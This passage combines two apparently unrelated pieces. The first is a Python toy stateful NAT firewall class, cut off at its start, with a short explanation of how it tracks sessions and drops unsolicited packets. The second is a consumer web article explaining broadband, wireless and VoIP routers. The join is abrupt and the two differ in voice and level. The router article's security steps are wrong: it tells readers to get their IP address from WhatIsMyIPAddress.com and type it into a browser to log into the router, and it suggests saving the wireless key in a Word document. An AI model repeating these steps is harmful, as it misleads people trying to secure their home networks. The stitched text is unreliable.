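    """Toy port-translating firewall with a connection state table."""

    def __init__(self, public_ip, first_port=40000):
        self.public_ip = public_ip
        self.next_port = first_port
        self.out = {}     # (int_ip, int_port, dst_ip, dst_port) -> public port
        self.back = {}    # (public port, dst_ip, dst_port) -> (int_ip, int_port)
        self.static = {}  # public port -> (int_ip, int_port) for published servers

    def publish(self, public_port, int_ip, int_port):
        """Static NAT: expose exactly one port of an internal server."""
        self.static[public_port] = (int_ip, int_port)

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Rewrite a packet leaving the private network; create state if new."""
        if not any(ipaddress.ip_address(src_ip) in n for n in PRIVATE_NETS):
            raise ValueError("source is not a private address")
        key = (src_ip, src_port, dst_ip, dst_port)
        if key not in self.out:
            self.out[key] = self.next_port
            self.back[(self.next_port, dst_ip, dst_port)] = (src_ip, src_port)
            self.next_port += 1
        return (self.public_ip, self.out[key], dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_port):
        """Map a packet arriving at the public IP, or return None (dropped)."""
        state = self.back.get((dst_port, src_ip, src_port))
        if state:
            return state                  # reply belonging to a tracked session
        return self.static.get(dst_port)  # published port, otherwise None

    def close(self, src_ip, src_port, dst_ip, dst_port):
        """Session ended: discard its state, as the text describes."""
        port = self.out.pop((src_ip, src_port, dst_ip, dst_port), None)
        if port is not None:
            del self.back[(port, dst_ip, dst_port)]

if __name__ == "__main__":
    fw = StatefulNat("203.0.113.1")  # constructed documentation addresses
    print(fw.outbound("192.168.1.10", 51000, "198.51.100.7", 80))
    print(fw.inbound("198.51.100.7", 80, 40000))  # reply to the tracked session
    print(fw.inbound("198.51.100.9", 80, 40000))  # unsolicited packet is dropped
```

Two workstations using the same source port receive different public ports, and a packet from a host that no internal machine contacted finds no state and no published port, so it is not forwarded.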

What is a Router?

Before we delve into the world of routers, you need to understand what a broadband connection is and how it works. According to Dictionary.com, broadband is "a high-speed, high-capacity transmission medium that can carry signals from multiple independent network carriers. This is done on a single coaxial or fiber-optic cable by establishing different bandwidth channels. Broadband technology can support a wide range of frequencies. It is used to transmit data, voice and video over long distances simultaneously."
Routers take information that arrives through your broadband signal via a modem, decipher it, and deliver it to your computer. The router will also choose the best route for the data packet so that you receive the information quickly.
Many different types of routers have been developed so that the information coming over your broadband connection can be sent to a variety of different receivers including your computer, your phone, and others.

Types of Routers

There are several types of routers that you will want to understand. You need to know the difference so that you can set up your network or at least so that you can understand what the local computer guy tells you to do.

Broadband Routers

Broadband routers can be used to do several different types of things. They can be used to connect two different computers or to connect two computers to the Internet. They can also be used to create a phone connection.
If you are using Voice over IP (VoIP) technology, then you will need a broadband router to connect your Internet to your phone. These are often a special type of modem that will have both Ethernet and phone jacks. Although this may seem a little confusing, simply follow the instructions that your VoIP provider sends with your broadband router - usually you must purchase the router from the company in order to obtain the service.

Wireless Routers

Wireless routers connect to your modem and create a wireless signal in your home or office. So, any computer within range can connect to your wireless router and use your broadband Internet for free. The only way to keep anyone from connecting to your system is to secure your router.
A word of warning about wireless routers: Be sure you secure them, or you will be susceptible to hackers and identity thieves. In order to secure your router, you simply need to come to WhatIsMyIPAddress.com, and get your IP address. Then, you'll type that into your web browser and log into your router (the user ID and password will come with your router).
Remember to change the router ID and password as well or someone else might lock you out of your system.
Once there, visit the wireless settings, type in a security key and you'll be about ready to go. Make sure you write down the key or save it in a Word document. When you try to log onto your Internet connection, you'll just need to enter the key. Your computer should remember the key, but write it down somewhere for safe keeping just in case.